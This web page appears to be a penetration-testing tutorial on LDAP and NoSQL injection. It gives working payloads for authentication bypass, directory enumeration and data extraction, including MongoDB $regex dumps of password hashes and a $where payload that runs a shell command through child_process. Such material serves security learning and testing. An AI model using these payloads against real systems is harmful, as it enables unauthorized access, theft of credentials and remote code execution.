Home > Website Pentesting

LDAP, NoSQL Injection

LDAP and NoSQL injection vulnerabilities occur when user input is inserted into directory service queries or unstructured database queries without proper sanitization. These attacks allow unauthorized data access, authentication bypass, privilege escalation, or full database compromise. Although SQL injection is more widely known, LDAP and NoSQL injection are equally dangerous in modern web applications that rely on directory services or document-oriented databases.

LDAP Injection

LDAP (Lightweight Directory Access Protocol) is used for authentication and directory lookups in systems such as Active Directory and OpenLDAP. Applications vulnerable to LDAP injection allow attackers to manipulate LDAP filters to access unauthorized directory entries or bypass login systems.

How LDAP Queries Work

Example LDAP authentication filter:

(&(uid=mayur)(password=12345))

If user input is directly concatenated:

(&(uid=" + input + ")(password=" + pass + "))

Attackers can modify the structure of the LDAP filter.

How LDAP Injection Happens

LDAP filters use special characters such as:

  • *

  • (

  • )

  • |

  • &

If these characters are not sanitized, attackers can inject logic to manipulate queries.

Example login payload:

*)(

Resulting filter:

(&(uid=*)(password=))

This matches all users and bypasses authentication.

Common LDAP Injection Payloads

Authentication Bypass

*)(uid=*)

Wildcard Injection

admin*)(password=*)

OR Logic Injection

mayur)(|(uid=*))

This forces the filter to always return true.

Full Filter Injection

*)(|(objectClass=*))

Returns all directory objects.

Practical LDAP Injection Discovery

Step 1: Test for Special Character Reflection

Inject:

(
)
*
|
&

If errors or unexpected responses appear, injection is likely.

Step 2: Try Authentication Bypass Payloads

admin*)(password=anything

If login succeeds, LDAP injection is confirmed.

Step 3: Extract Directory Information

Try:

*)(uid=*)

This dumps accessible entries.

Step 4: Out-of-Band Testing via Burp

Inject payloads into:

  • Username fields

  • Email fields

  • Search filters

  • Login forms

Monitor differences in responses.

LDAP Injection in Search Features

Example search filter:

(&(cn=" + input + ")(objectClass=user))

Payload:

*)(objectClass=*)

Leads to full user enumeration.

Real-World Impact of LDAP Injection

Once exploited, attackers can:

  • Bypass authentication

  • Enumerate all users

  • Extract confidential directory data

  • Escalate to administrative accounts

  • Access email addresses

  • Identify domain structure

LDAP injection directly compromises the directory structure.

NoSQL Injection

NoSQL databases such as MongoDB, CouchDB, Redis, DynamoDB, and Elasticsearch use flexible schemas and JSON-like queries. Many applications directly insert user input into these queries without validation. NoSQL injection exploits this behavior to manipulate query logic.

How NoSQL Queries Work

Example MongoDB query:

db.users.find({ username: input, password: input });

If attackers control these fields, they can inject unexpected structures.

How NoSQL Injection Happens

Because NoSQL supports JSON objects, attackers can submit payloads that alter the query structure.

Example login payload:

username[$ne]=null
password[$ne]=null

Converted into query:

{ username: { $ne: null }, password: { $ne: null } }

This matches all users and bypasses authentication.

Common NoSQL Injection Payloads

Bypass Authentication with $ne Operator

username[$ne]=x
password[$ne]=x

Boolean Injection

username[$gt]=

Evaluates as always true.

Array Injection

username[]=admin

Triggers unexpected query behavior.

Null Injection

username[$exists]=true

Returns all documents where username exists.

Practical NoSQL Injection Discovery

Step 1: Test for Parameter Structure Injection

Try passing objects instead of strings:

username[$ne]=anything

If server treats it as JSON → injectable.

Step 2: Look for Authentication Bypass

Try:

username[$ne]=null&password[$ne]=null

If login succeeds, injection is confirmed.

Step 3: Inject Conditions into Filters

Example search parameter:

?q=test

Inject:

?q[$regex]=.*

Returns all data.

Step 4: Detect Error Messages

Malformed JSON often reveals:

  • Database type

  • Driver version

  • Query structure

Example:

"error": "MongoError: unknown operator $ne"

Confirms MongoDB backend.

JSON Injection in Body Data

For APIs accepting JSON:

{
  "user": {"$ne": null},
  "pass": {"$ne": null}
}

If the server parses this as-is → injectable.

Practical MongoDB Extraction Techniques

Discover Collections

Inject:

{"$where":"sleep(5000)"}

If response delays → NoSQL injection confirmed.

Extract Data from Collections

Use regex extraction:

username[$regex]=.*

This returns all usernames.

Retrieve Password Hashes

password[$regex]=.*

Used to dump entire user collections.

NoSQL Injection in Node.js Apps

Node.js apps often contain insecure patterns:

db.users.find({ user: req.body.user })

If attacker sends:

{"user": {"$gt": ""}}

All users match.

NoSQL Injection via Cookies

Some apps store filters in cookies:

filter={"role":"user"}

Modify:

filter={"role":{"$ne":"admin"}}

Application returns all admin entries.

Command Injection via NoSQL Functions

MongoDB’s $where operator executes JavaScript:

{"$where":"this.password.match(/.*/)"}

Malicious payload:

{"$where":"this.constructor.constructor('return process')().mainModule.require('child_process').exec('id')"}

This leads to remote command execution if allowed.

Why NoSQL Injection Happens

NoSQL injection occurs due to:

  • Accepting unvalidated JSON objects

  • Automatically merging user input into query objects

  • Trusting arrays/objects in parameters

  • Poor filtering or sanitization

  • Insecure query building patterns

Developers often forget that injecting a JSON object is equivalent to injecting SQL logic in relational systems.

Impact of LDAP and NoSQL Injection

These attacks allow:

  • Authentication bypass

  • Unauthorized data extraction

  • Privilege escalation

  • Full directory enumeration (LDAP)

  • Complete database dumping (NoSQL)

  • Execution of backend logic

  • Remote code execution in advanced cases

  • Full application compromise

LDAP affects identity systems; NoSQL affects modern databases, making both extremely high-impact vulnerabilities.

Intel Dump

  • LDAP injection manipulates directory filters using special characters and logic operators.

  • LDAP payloads include wildcards, OR conditions, and filter breakouts that enable authentication bypass and directory enumeration.

  • NoSQL injection manipulates JSON-based queries using operators like $ne, $gt, $exists, and $regex.

  • Authentication bypass in NoSQL occurs by injecting objects instead of strings.

  • NoSQL injection enables query alteration, data extraction, and even JavaScript-based RCE in some MongoDB configurations.

  • Both LDAP and NoSQL injection arise from concatenating untrusted input into query structures.

HOME LEARN COMMUNITY DASHBOARD